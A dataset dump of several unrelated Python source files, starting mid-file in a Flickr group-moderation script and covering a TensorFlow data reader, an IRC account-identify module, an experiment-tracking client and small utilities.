\\n'.format(page, number_of_pages, photos_per_page).replace(' ',' '))\n report_file.write('|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
\\n')\n report_file.write('| | PHOTO | OWNER | LENS MODEL | F. LENGTH | DATE ADDED | ACTION |
\\n'.replace(' ',' '))\n report_file.write('|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
\\n')\n report_file.close()\n\ndef addPhotoToRemove(remove_file_name, page_number, photo_number, photo_id, owner_id, photo_title, photo_owner, lens_model, focal_length):\n remove_file = open(remove_file_name, 'a')\n remove_file.write('# {0},{1} {2}:{3} @{4}'.format(page_number, photo_number, photo_title, lens_model, focal_length))\n remove_file.write('\\n# https://www.flickr.com/photos/{0}/{1}/in/pool-{2}\\n'.format(owner_id, photo_id, group_data.group_alias))\n remove_file.write('procs.removePhoto(api_key, \\'{0}\\', \\'{1}\\', \\'{2}\\', \\'{3}\\')\\n\\n'.format(group_id, photo_id, photo_title.replace(\"\\'\", \"\\\\\\'\"), photo_owner))\n remove_file.close()\n\ndef addPhoto(report_file_name, html_file_name, remove_file_name, pool, page_number, photo_number):\n photo_id = pool['photos']['photo'][photo_number]['id']\n photo_title = pool['photos']['photo'][photo_number]['title']\n photo_owner = pool['photos']['photo'][photo_number]['ownername']\n owner_id = pool['photos']['photo'][photo_number]['owner']\n\n try:\n photo_url = flickr.people.getInfo(api_key=api_key, user_id=owner_id)['person']['photosurl']['_content'] + photo_id\n date_added = pool['photos']['photo'][photo_number]['dateadded']\n except:\n photo_url = ''\n date_added = '0000000000'\n\n try:\n exif = getExif(photo_id, 0)\n lens_model = getLensModel(exif)\n focal_length = getFocalLength(exif)\n except:\n lens_model = 'NO EXIF'\n focal_length = 'NO EXIF'\n\n asian = photo_title.strip(data.eastern_chars)\n no_asian = photo_title.replace(asian,'')\n date = datetime.fromtimestamp(int(date_added)).strftime('%d/%m/%Y')\n\n report_file = open(report_file_name,'a')\n report_file.write('| {0:3} | {1:50.50} | {2:35.35} | {3:40.40} | {4:>10.10} | {5:>10.10} '.format(photo_number+1, no_asian, photo_owner, lens_model, focal_length, date))\n if (not(lens_model in lens_models)) or (not(focal_length in focal_lengths)):\n if lens_model != 'NO EXIF' and focal_length != 'NO EXIF' and lens_model != '' and focal_length != '':\n report_file.write('| REMOVE |\\n')\n addPhotoToRemove(remove_file_name, page_number, photo_number+1, photo_id, owner_id, photo_title, photo_owner, lens_model, focal_length)\n else:\n report_file.write('| REVIEW |\\n')\n else:\n report_file.write('| KEEP |\\n')\n report_file.close()\n\n report_file = open(html_file_name,'a')\n report_file.write('| {0:3} | {1:50.50} | {2:35.35} | {3:40.40} | {4:>10.10} | {5:>10.10} '.format(photo_number+1, no_asian, photo_owner, lens_model, focal_length, date).replace(' ',' '))\n if (not(lens_model in lens_models)) or (not(focal_length in focal_lengths)):\n if lens_model != 'NO EXIF' and focal_length != 'NO EXIF' and lens_model != '' and focal_length != '':\n report_file.write('| REMOVE |
\\n'.format(photo_url).replace(' ','&nbsp;').replace('ahref','a href').replace('target', ' target'))\n else:\n report_file.write('| REVIEW |\\n'.format(photo_url).replace(' ','&nbsp;').replace('ahref','a href').replace('target', ' target'))\n else:\n report_file.write('| KEEP |
\\n'.replace(' ',' '))\n report_file.close()\n\ndef addPageFooter(report_file_name, html_file_name):\n report_file = open(report_file_name,'a')\n report_file.write('+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+\\n')\n report_file.close()\n\n report_file = open(html_file_name,'a')\n report_file.write('+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
\\n')\n report_file.write('\\n\\n')\n report_file.close()\n\ndef addLastRemoveRunProcedure(remove_file_name, group_id):\n remove_file = open(remove_file_name, 'a')\n remove_file.write('\\nprocs.writeLastRemoveRun(\\'{0}\\')\\n'.format(group_id))\n remove_file.close()\n\ndef removePhoto(api_key, group_id, photo_id, photo_title, photo_owner):\n try:\n flickr.groups.pools.remove(api_key=api_key, photo_id=photo_id, group_id=group_id)\n print('Removed photo: \\\"{0}\\\" by {1}'.format(photo_title, photo_owner))\n except:\n print('FAILED removing photo: \\\"{0}\\\" by {1}'.format(photo_title, photo_owner))\n\ndef writeLastRemoveRun(group_id):\n try:\n pool = flickr.groups.pools.getPhotos(api_key=api_key, group_id=group_id)\n number_of_photos_after_current_remove = int(pool['photos']['total'])\n last_run = open('last_remove_run.py', 'w')\n last_run.write('number_of_photos = {0}'.format(number_of_photos_after_current_remove))\n last_run.close()\n except:\n pass\n\n","sub_path":"group_admin/files/procs.py","file_name":"procs.py","file_ext":"py","file_size_in_byte":11344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"462462980","text":"# https://leetcode.com/problems/insufficient-nodes-in-root-to-leaf-paths/\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nfinal_root = None\n\n\ndef drop(node):\n if node.parent is None:\n global final_root\n final_root = None\n return\n if node.parent.left == node:\n node.parent.left = None\n if node.parent.right == node:\n node.parent.right = None\n\n\ndef is_insufficient(node, limit):\n if node is None:\n return True\n if node.left is None and node.right is None:\n if node.sum_from_root < limit:\n drop(node)\n return True\n else:\n if node.left is not None:\n node.left.parent = node\n node.left.sum_from_root = node.left.val + node.sum_from_root\n if node.right is not None:\n node.right.parent = node\n node.right.sum_from_root = node.right.val + node.sum_from_root\n l = is_insufficient(node.left, limit)\n r = is_insufficient(node.right, limit)\n if l and r:\n drop(node)\n return True\n return False\n\n\nclass Solution:\n def sufficientSubset(self, root: TreeNode, limit: int) -> TreeNode:\n global final_root\n root.sum_from_root = root.val\n root.parent = None\n final_root = root\n is_insufficient(root, limit)\n return final_root\n","sub_path":"2020/arjoonn/d2.py","file_name":"d2.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"117668523","text":"# Copyright 2016 The TensorFlow Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Implements a parallel data reader with queues and optional shuffling.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom tensorflow.python.framework import dtypes as tf_dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import data_flow_ops\nfrom tensorflow.python.ops import io_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.platform import gfile\nfrom tensorflow.python.summary import summary\nfrom tensorflow.python.training import input as tf_input\nfrom tensorflow.python.training import queue_runner\n\n\nclass ParallelReader(io_ops.ReaderBase):\n \"\"\"Reader class that uses multiple readers in parallel to improve speed.\n\n See ReaderBase for supported methods.\n \"\"\"\n\n def __init__(self,\n reader_class,\n common_queue,\n num_readers=4,\n reader_kwargs=None):\n \"\"\"ParallelReader creates num_readers instances of the reader_class.\n\n Each instance is created by calling the `reader_class` function passing\n the arguments specified in `reader_kwargs` as in:\n reader_class(**read_kwargs)\n\n When you read from a ParallelReader, with its `read()` method,\n you just dequeue examples from the `common_queue`.\n\n The readers will read different files in parallel, asynchronously enqueueing\n their output into `common_queue`. The `common_queue.dtypes` must be\n [tf.string, tf.string]\n\n Because each reader can read from a different file, the examples in the\n `common_queue` could be from different files. Due to the asynchronous\n reading there is no guarantee that all the readers will read the same\n number of examples.\n\n If the `common_queue` is a shuffling queue, then the examples are shuffled.\n\n Usage:\n common_queue = tf.RandomShuffleQueue(\n capacity=256,\n min_after_dequeue=128,\n dtypes=[tf.string, tf.string])\n p_reader = ParallelReader(tf.TFRecordReader, common_queue)\n\n common_queue = tf.FIFOQueue(\n capacity=256,\n dtypes=[tf.string, tf.string])\n p_reader = ParallelReader(readers, common_queue, num_readers=2)\n\n\n Args:\n reader_class: one of the io_ops.ReaderBase subclasses ex: TFRecordReader\n common_queue: a Queue to hold (key, value pairs) with `dtypes` equal to\n [tf.string, tf.string]. Must be one of the data_flow_ops.Queues\n instances, ex. 
`tf.FIFOQueue()`, `tf.RandomShuffleQueue()`, ...\n num_readers: a integer, number of instances of reader_class to create.\n reader_kwargs: an optional dict of kwargs to create the readers.\n\n Raises:\n TypeError: if `common_queue.dtypes` is not [tf.string, tf.string].\n \"\"\"\n if len(common_queue.dtypes) != 2:\n raise TypeError('common_queue.dtypes must be [tf.string, tf.string]')\n for dtype in common_queue.dtypes:\n if not dtype.is_compatible_with(tf_dtypes.string):\n raise TypeError('common_queue.dtypes must be [tf.string, tf.string]')\n\n reader_kwargs = reader_kwargs or {}\n self._readers = [reader_class(**reader_kwargs) for _ in range(num_readers)]\n self._common_queue = common_queue\n\n @property\n def num_readers(self):\n return len(self._readers)\n\n @property\n def common_queue(self):\n return self._common_queue\n\n def read(self, queue, name=None):\n \"\"\"Returns the next record (key, value pair) produced by the reader.\n\n The multiple reader instances are all configured to `read()` from the\n filenames listed in `queue` and enqueue their output into the `common_queue`\n passed to the constructor, and this method returns the next record dequeued\n from that `common_queue`.\n\n\n Readers dequeue a work unit from `queue` if necessary (e.g. when a\n reader needs to start reading from a new file since it has finished with\n the previous file).\n\n A queue runner for enqueing in the `common_queue` is automatically added to\n the TF QueueRunners collection.\n\n Args:\n queue: A Queue or a mutable string Tensor representing a handle\n to a Queue, with string work items.\n name: A name for the operation (optional).\n\n Returns:\n The next record (i.e. (key, value pair)) from the common_queue.\n \"\"\"\n\n enqueue_ops = []\n for reader in self._readers:\n enqueue_ops.append(self._common_queue.enqueue(reader.read(queue)))\n\n queue_runner.add_queue_runner(\n queue_runner.QueueRunner(self._common_queue, enqueue_ops))\n\n return self._common_queue.dequeue(name=name)\n\n def num_records_produced(self, name=None):\n \"\"\"Returns the number of records this reader has produced.\n\n Args:\n name: A name for the operation (optional).\n\n Returns:\n An int64 Tensor.\n\n \"\"\"\n num_records = [r.num_records_produced() for r in self._readers]\n return math_ops.add_n(num_records, name=name)\n\n def num_work_units_completed(self, name=None):\n \"\"\"Returns the number of work units this reader has finished processing.\n\n Args:\n name: A name for the operation (optional).\n\n Returns:\n An int64 Tensor.\n \"\"\"\n num_work_units = [r.num_work_units_completed() for r in self._readers]\n return math_ops.add_n(num_work_units, name=name)\n\n\ndef parallel_read(data_sources,\n reader_class,\n num_epochs=None,\n num_readers=4,\n reader_kwargs=None,\n shuffle=True,\n dtypes=None,\n capacity=256,\n min_after_dequeue=128,\n seed=None,\n scope=None):\n \"\"\"Reads multiple records in parallel from data_sources using n readers.\n\n It uses a ParallelReader to read from multiple files in parallel using\n multiple readers created using `reader_class` with `reader_kwargs'.\n\n If shuffle is True the common_queue would be a RandomShuffleQueue otherwise\n it would be a FIFOQueue.\n\n Usage:\n data_sources = ['path_to/train*']\n key, value = parallel_read(data_sources, tf.CSVReader, num_readers=4)\n\n Args:\n data_sources: a list/tuple of files or the location of the data, i.e.\n /path/to/train@128, /path/to/train* or /tmp/.../train*\n reader_class: one of the io_ops.ReaderBase subclasses ex: TFRecordReader\n 
num_epochs: The number of times each data source is read. If left as None,\n the data will be cycled through indefinitely.\n num_readers: a integer, number of Readers to create.\n reader_kwargs: an optional dict, of kwargs for the reader.\n shuffle: boolean, wether should shuffle the files and the records by using\n RandomShuffleQueue as common_queue.\n dtypes: A list of types. The length of dtypes must equal the number\n of elements in each record. If it is None it will default to\n [tf.string, tf.string] for (key, value).\n capacity: integer, capacity of the common_queue.\n min_after_dequeue: integer, minimum number of records in the common_queue\n after dequeue. Needed for a good shuffle.\n seed: A seed for RandomShuffleQueue.\n scope: Optional name scope for the ops.\n\n Returns:\n key, value: a tuple of keys and values from the data_source.\n \"\"\"\n data_files = get_data_files(data_sources)\n with ops.name_scope(scope, 'parallel_read'):\n filename_queue = tf_input.string_input_producer(\n data_files, num_epochs=num_epochs, shuffle=shuffle, seed=seed,\n name='filenames')\n dtypes = dtypes or [tf_dtypes.string, tf_dtypes.string]\n if shuffle:\n common_queue = data_flow_ops.RandomShuffleQueue(\n capacity=capacity,\n min_after_dequeue=min_after_dequeue,\n dtypes=dtypes,\n seed=seed,\n name='common_queue')\n else:\n common_queue = data_flow_ops.FIFOQueue(\n capacity=capacity, dtypes=dtypes, name='common_queue')\n\n summary.scalar('fraction_of_%d_full' % capacity,\n math_ops.to_float(common_queue.size()) * (1. / capacity))\n\n return ParallelReader(\n reader_class,\n common_queue,\n num_readers=num_readers,\n reader_kwargs=reader_kwargs).read(filename_queue)\n\n\ndef single_pass_read(data_sources, reader_class, reader_kwargs=None,\n scope=None):\n \"\"\"Reads sequentially the data_sources using the reader, doing a single pass.\n\n Args:\n data_sources: a list/tuple of files or the location of the data, i.e.\n /path/to/train@128, /path/to/train* or /tmp/.../train*\n reader_class: one of the io_ops.ReaderBase subclasses ex: TFRecordReader.\n reader_kwargs: an optional dict, of kwargs for the reader.\n scope: Optional name scope for the ops.\n\n Returns:\n key, value: a tuple of keys and values from the data_source.\n \"\"\"\n data_files = get_data_files(data_sources)\n with ops.name_scope(scope, 'single_pass_read'):\n filename_queue = tf_input.string_input_producer(\n data_files, num_epochs=1, shuffle=False, capacity=1, name='filenames')\n reader_kwargs = reader_kwargs or {}\n return reader_class(**reader_kwargs).read(filename_queue)\n\n\ndef get_data_files(data_sources):\n \"\"\"Get data_files from data_sources.\n\n Args:\n data_sources: a list/tuple of files or the location of the data, i.e.\n /path/to/train@128, /path/to/train* or /tmp/.../train*\n\n Returns:\n a list of data_files.\n\n Raises:\n ValueError: if not data files are not found\n\n \"\"\"\n if isinstance(data_sources, (list, tuple)):\n data_files = []\n for source in data_sources:\n data_files += get_data_files(source)\n else:\n if '*' in data_sources or '?' 
in data_sources or '[' in data_sources:\n data_files = gfile.Glob(data_sources)\n else:\n data_files = [data_sources]\n if not data_files:\n raise ValueError('No data files found in %s' % (data_sources,))\n return data_files\n","sub_path":"Keras_tensorflow/source/tensorflow/contrib/slim/python/slim/data/parallel_reader.py","file_name":"parallel_reader.py","file_ext":"py","file_size_in_byte":10492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"650500118","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\packages\\spacecomponents\\client\\components\\siphon.py\nfrom dogma.attributes.format import GetFormatAndValue\nimport evetypes\n__author__ = 'markus'\nfrom spacecomponents.client.display import EntryData, RANGE_ICON\nfrom spacecomponents.common.components.component import Component\n\nclass Siphon(Component):\n\n @staticmethod\n def GetAttributeInfo(godmaService, typeID, attributes, instance, localization):\n attributeEntries = [\n EntryData('Header', localization.GetByLabel('UI/Inflight/SpaceComponents/Siphon/SiphoningMaterials'))]\n materialNames = []\n for materialID in attributes.materials:\n materialNames.append((evetypes.GetName(materialID), materialID))\n\n for material in sorted(materialNames):\n attributeEntries.append(EntryData('LabelTextSides', material[0], '', evetypes.GetIconID(material[1]), material[1]))\n\n return attributeEntries","sub_path":"client/spacecomponents/client/components/siphon.py","file_name":"siphon.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"55519774","text":"# Objet Arbre\n\nclass Arbre:\n\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n self.parent = None\n\n def insert(self, data):\n if data < self.data:\n if self.left is None:\n self.left = Arbre(data)\n self.left.parent = self\n else:\n self.left.insert(data)\n elif data > self.data:\n if self.right is None:\n self.right = Arbre(data)\n self.right.parent = self\n else:\n self.right.insert(data)\n\n def pprint(self, level=0):\n if self.right:\n self.right.pprint(level + 1)\n print(f\"{' ' * 4 * level}{self.data}\")\n if self.left:\n self.left.pprint(level + 1)\n\n def count_children(self):\n return bool(self.left) + bool(self.right)\n\n def is_left_child(self):\n return self.parent and self is self.parent.left\n\n def is_right_child(self):\n return self.parent and self is self.parent.right\n\n def delete(self, data):\n\n arbre = self.get(data)\n\n if not arbre:\n return\n\n children_count = arbre.count_children()\n\n if children_count == 0:\n if arbre.is_left_child():\n arbre.parent.left = None\n else:\n arbre.parent.right = None\n del arbre\n\n elif children_count == 1:\n child = arbre.left or arbre.right\n if arbre.is_left_child():\n arbre.parent.left = child\n child.parent = arbre.parent\n del arbre\n elif arbre.is_right_child():\n arbre.parent.right = child\n child.parent = arbre.parent\n del arbre\n else:\n root = arbre\n root.data = child.data\n root.left = child.left\n root.right = child.right\n if child.left:\n child.left.parent = root\n if child.right:\n child.right.parent = root\n del child\n\n else:\n succ = arbre.get_successor()\n arbre.data = succ.data\n if succ.is_left_child():\n succ.parent.left = succ.right\n else:\n succ.parent.right = succ.right\n if succ.right:\n succ.right.parent = 
succ.parent\n del succ\n\n# Getters\n\n def get(self, data):\n if data < self.data:\n return self.left.get(data) if self.left else None\n elif data > self.data:\n return self.right.get(data) if self.right else None\n return self\n\n def getMin(self):\n arbre = self\n while arbre.left:\n arbre = arbre.left\n return arbre\n\n def getMax(self):\n arbre = self\n while arbre.right:\n arbre = arbre.right\n return arbre\n\n def get_height(self):\n return 1 + max(\n self.left.get_height() if self.left else -1,\n self.right.get_height() if self.right else -1\n )\n\n def get_successor(self):\n if self.right:\n return self.right.min()\n arbre = self\n while arbre.is_right_child():\n arbre = arbre.parent\n return arbre.parent\n\n def get_predecessor(self):\n if self.left:\n return self.left.max()\n arbre = self\n while arbre.is_left_child():\n arbre = arbre.parent\n return arbre.parent\n\n def getData(self):\n return self.data","sub_path":"arbre.py","file_name":"arbre.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"452578512","text":"from django import template\nfrom django.http import QueryDict\n\nregister = template.Library()\n\n@register.filter\ndef replace(value, args):\n qs = QueryDict(args)\n if qs.has_key('old') and qs.has_key('newValue'):\n return value.replace(qs['old'], qs['newValue'])\n else:\n return value\n","sub_path":"game/templatetags/replace.py","file_name":"replace.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"346444738","text":"from twisted.plugin import IPlugin\nfrom twisted.words.protocols import irc\nfrom txircd.module_interface import Command, ICommand, IModuleData, ModuleData\nfrom zope.interface import implementer\nfrom typing import Any, Dict, List, Optional, Tuple, Union\n\nirc.ERR_SERVICES = \"955\" # Custom numeric; 955 \n\n@implementer(IPlugin, IModuleData)\nclass AccountIdentify(ModuleData):\n\tname = \"AccountIdentify\"\n\t\n\tdef userCommands(self) -> List[Tuple[str, int, Command]]:\n\t\treturn [ (\"IDENTIFY\", 1, IdentifyCommand(self)),\n\t\t\t(\"ID\", 1, IdCommand(self)) ]\n\t\n\tdef parseParams(self, command: str, user: \"IRCUser\", params: List[str], prefix: str, tags: Dict[str, Optional[str]]) -> Optional[Dict[Any, Any]]:\n\t\tif not params:\n\t\t\tuser.sendSingleError(\"IdentifyParams\", irc.ERR_NEEDMOREPARAMS, command, \"Not enough parameters\")\n\t\t\treturn None\n\t\tif len(params) == 1:\n\t\t\treturn {\n\t\t\t\t\"password\": params[0]\n\t\t\t}\n\t\treturn {\n\t\t\t\"accountname\": params[0],\n\t\t\t\"password\": params[1]\n\t\t}\n\t\n\tdef execute(self, user: \"IRCUser\", data: Dict[Any, Any]) -> bool:\n\t\tif \"accountname\" in data:\n\t\t\taccountName = data[\"accountname\"]\n\t\telse:\n\t\t\taccountName = self.ircd.runActionUntilValue(\"accountfromnick\", user.nick)\n\t\t\tif not accountName:\n\t\t\t\tuser.sendMessage(irc.ERR_SERVICES, \"ACCOUNT\", \"IDENTIFY\", \"NOTEXIST\")\n\t\t\t\tuser.sendMessage(\"NOTICE\", \"No account could be found associated with your nickname.\")\n\t\t\t\treturn True\n\t\tresultValue = self.ircd.runActionUntilValue(\"accountauthenticate\", user, accountName, data[\"password\"])\n\t\tif not resultValue:\n\t\t\tuser.sendMessage(irc.ERR_SERVICES, \"ACCOUNT\", \"IDENTIFY\", \"NOACCOUNT\")\n\t\t\tuser.sendMessage(\"NOTICE\", \"This server doesn't have accounts set up.\")\n\t\t\treturn True\n\t\tif resultValue[0] is 
None:\n\t\t\tresultValue[1].addCallback(self.checkAuthSuccess, user)\n\t\t\treturn True\n\t\tif resultValue[0]:\n\t\t\treturn True\n\t\tuser.sendMessage(irc.ERR_SERVICES, \"ACCOUNT\", \"IDENTIFY\", resultValue[1])\n\t\tuser.sendMessage(\"NOTICE\", resultValue[2])\n\t\treturn True\n\t\n\tdef checkAuthSuccess(self, result: Union[Tuple[bool, Optional[str], Optional[str]], Tuple[None, \"Deferred\", None]], user: \"IRCUser\") -> None:\n\t\tif user.uuid not in self.ircd.users:\n\t\t\treturn\n\t\tloginSuccess, errorCode, errorMessage = result\n\t\tif loginSuccess:\n\t\t\treturn\n\t\tuser.sendMessage(irc.ERR_SERVICES, \"ACCOUNT\", \"IDENTITY\", errorCode)\n\t\tuser.sendMessage(\"NOTICE\", errorMessage)\n\n@implementer(ICommand)\nclass IdentifyCommand(Command):\n\tdef __init__(self, module):\n\t\tself.module = module\n\t\n\tdef parseParams(self, user: \"IRCUser\", params: List[str], prefix: str, tags: Dict[str, Optional[str]]) -> Optional[Dict[Any, Any]]:\n\t\treturn self.module.parseParams(\"IDENTIFY\", user, params, prefix, tags)\n\t\n\tdef execute(self, user: \"IRCUser\", data: Dict[Any, Any]) -> bool:\n\t\treturn self.module.execute(user, data)\n\n@implementer(ICommand)\nclass IdCommand(Command):\n\tdef __init__(self, module):\n\t\tself.module = module\n\t\n\tdef parseParams(self, user: \"IRCUser\", params: List[str], prefix: str, tags: Dict[str, Optional[str]]) -> Optional[Dict[Any, Any]]:\n\t\treturn self.module.parseParams(\"ID\", user, params, prefix, tags)\n\t\n\tdef execute(self, user: \"IRCUser\", data: Dict[Any, Any]) -> bool:\n\t\treturn self.module.execute(user, data)\n\nidentifyCommand = AccountIdentify()","sub_path":"txircd/modules/extra/services/account_identify.py","file_name":"account_identify.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"359710518","text":"import requests\nimport urllib\nimport json\nfrom datetime import datetime\nfrom .utils import dict2obj, NpEncoder\nfrom .telegram import TelegramStats\nPROJECT_ROOT = '/project'\n\nclass Analytics():\n\n def __init__(self, host='127.0.0.1', port=80, telegram_secret_key=None, telegram_group_key=None):\n '''\n host: static ip to your server\n telegram_secret_key: secret key to access your telegram bot\n telegram group_key : group id key\n '''\n self.telebot = None\n if telegram_secret_key and telegram_group_key:\n self.telebot = TelegramStats(secret_key=telegram_secret_key, group_key=telegram_group_key)\n \n if port != 80:\n self.target_url = 'http://' + host + ':' + str(port)\n else:\n self.target_url = 'http://' + host\n res = requests.get(self.target_url+'/ping')\n self.latest_project_id = None\n if res.status_code != requests.codes.ok:\n raise ValueError('Unable to reach server')\n\n def check_connection(self):\n res = requests.get(self.target_url+'/ping')\n self.latest_project_id = None\n if res.status_code != requests.codes.ok:\n return False\n return True\n \n def create_project(self, name, description, search_space=None):\n res = requests.get(self.target_url+'/project/'+str(name))\n if res.status_code != requests.codes.ok:\n data = {\n 'name': name,\n 'description': description,\n }\n if search_space is not None and isinstance(search_space, dict):\n data['search_space'] = search_space\n \n res = requests.post(self.target_url+'/project', data=json.dumps(data, cls=NpEncoder), headers={\n 'Content-Type': 'application/json'\n })\n if res.status_code != requests.codes.ok:\n raise ValueError('Unable to create project : %s' 
% res.text)\n project = res.json()\n self.latest_project_id = project['id']\n return project, True\n self.latest_project_id = res.json()['id']\n return dict2obj(res.json()), False\n\n def project(self, project_id=None):\n if project_id is None:\n if self.latest_project_id is None:\n raise ValueError('Project ID should be provided')\n project_id = self.latest_project_id\n url = '{}/project/{}'.format(self.target_url, project_id)\n res = requests.get(url)\n if res.status_code != requests.codes.ok:\n raise ValueError('Unable to retrieve project : %s '% res.text)\n trial = res.json()\n return dict2obj(trial)\n\n def list_project(self):\n res = requests.get(self.target_url+'/project')\n if res.status_code != requests.codes.ok:\n raise ValueError('Unable to list project: Network error')\n raw_projects = res.json()\n if raw_projects['count'] > 0:\n return [ dict2obj(p) for p in raw_projects['projects'] ]\n return []\n\n def get_hyperopt_params(self, project_name):\n url = '{}/project/{}/hyperopt'.format(self.target_url , project_name)\n res = requests.get(url)\n if res.status_code != requests.codes.ok:\n return None\n trial = res.json()\n if trial['is_assigned'] and 'status' not in trial:\n return dict2obj(trial)\n else:\n return None\n\n def update_hyperopt_results(self, project_name, trial_id, results):\n '''results\n\n '''\n if 'total_acc' not in results:\n raise ValueError('Must have total_acc attribute')\n\n payload = results\n if len(payload) == 0:\n return None\n\n url = '{}/project/{}/hyperopt/{}'.format(self.target_url , project_name , trial_id)\n res = requests.post(url, data=json.dumps(payload, cls=NpEncoder), headers={\n 'Content-Type': 'application/json'\n })\n\n if res.status_code != requests.codes.ok:\n return None\n trial = res.json()\n if self.telebot is not None:\n self.telebot.send_msg('Trial {} updated'.format(trial['updated']['name']))\n if 'status' not in trial:\n return dict2obj(trial)\n else:\n return None\n\n def create_trial(self, name, params, description=None, project_id=None, n_fold=None, results=None, machine='default', data_metadata=None ):\n if project_id is None:\n if self.latest_project_id is None:\n raise ValueError('Project ID should be provided')\n project_id = self.latest_project_id\n\n payload = {\n 'name': name,\n 'params': params,\n }\n if description:\n payload['description'] = description\n if n_fold is not None:\n payload['n_fold'] = n_fold\n if results:\n payload['results'] = results\n if machine:\n payload['machine'] = machine\n if data_metadata:\n payload['data_metadata'] = data_metadata\n\n url = '{}/project/{}/trial'.format(self.target_url, project_id)\n res = requests.post(url, data=json.dumps(payload, cls=NpEncoder), headers={\n 'Content-Type': 'application/json'\n })\n if res.status_code != requests.codes.ok:\n raise ValueError('Unable to create a new trial %s' % res.text)\n trial = res.json()\n if self.telebot is not None:\n self.telebot.send_msg('Trial {} created, this is the {} nth fold'.format(trial['name'], trial['n_fold']))\n return dict2obj(trial)\n \n def from_args(self, name, args, description=None, project_id=None, machine=None, n_fold=None, data_metadata=None):\n if description is None:\n description = 'Trial run at {}'.format(datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\"))\n params = vars(args)\n return self.create_trial(name, params, description=description, project_id=project_id, n_fold=n_fold, data_metadata=data_metadata )\n\n def get_trial(self, trial_id, project_id=None):\n if project_id is None:\n if self.latest_project_id is 
None:\n raise ValueError('Project ID should be provided')\n project_id = self.latest_project_id\n url = '{}/project/{}/trial/{}'.format(self.target_url , project_id , trial_id)\n res = requests.post(url, data=json.dumps(payload, cls=NpEncoder), headers={\n 'Content-Type': 'application/json'\n })\n\n def update_trial(self, trial_id, params=None,project_id=None, n_fold=None, results=None, data_metadata=None):\n '''\n return : return updated instance if trial_id is found, else return a None type\n '''\n if project_id is None:\n if self.latest_project_id is None:\n raise ValueError('Project ID should be provided')\n project_id = self.latest_project_id\n payload = {}\n if params is not None:\n payload['params'] = params\n if n_fold is not None:\n payload['n_fold'] = n_fold\n if results is not None:\n payload['results'] = results\n if data_metadata is not None:\n payload['data_metadata'] = data_metadata\n if len(payload) == 0:\n return None\n\n url = '{}/project/{}/trial/{}'.format(self.target_url , project_id , trial_id)\n res = requests.post(url, data=json.dumps(payload, cls=NpEncoder), headers={\n 'Content-Type': 'application/json'\n })\n\n if res.status_code != requests.codes.ok:\n raise ValueError('Unable to update trial %s' % res.text)\n trial = res.json()\n if self.telebot is not None:\n self.telebot.send_msg('Trial {} updated'.format(trial['updated']['name']))\n if trial['update'] > 0:\n return dict2obj(trial['updated'])\n else:\n return None","sub_path":"dlanalytics/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":7949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"277518744","text":"__author__ = 'jim.graf'\n\nimport logging\nimport Queue\n\nclass Consumer:\n\n def __init__(self, target=None, log_queue=None):\n self.target = target\n self.log_queue = log_queue\n\n def consume(self, item):\n try:\n self.log_queue.put(item=\"Consuming {item}\".format(item=item), block=True, timeout=60)\n except Queue.full:\n logging.fatal(\"Unable to write to logging queue\")\n exit(1)","sub_path":"examples/mytest/Consumer.py","file_name":"Consumer.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"439087395","text":"#!/usr/bin/env python3\n\n# Mainumby: Parsing and translation with minimal dependency grammars.\n#\n########################################################################\n#\n# This file is part of the HLTDI L^3 project\n# for parsing, generation, translation, and computer-assisted\n# human translation.\n#\n# Copyleft 2014, 2015, 2016, 2017, 2018; HLTDI, PLoGS \n# \n# This program is free software: you can redistribute it and/or\n# modify it under the terms of the GNU General Public License as\n# published by the Free Software Foundation, either version 3 of\n# the License, or (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program. 
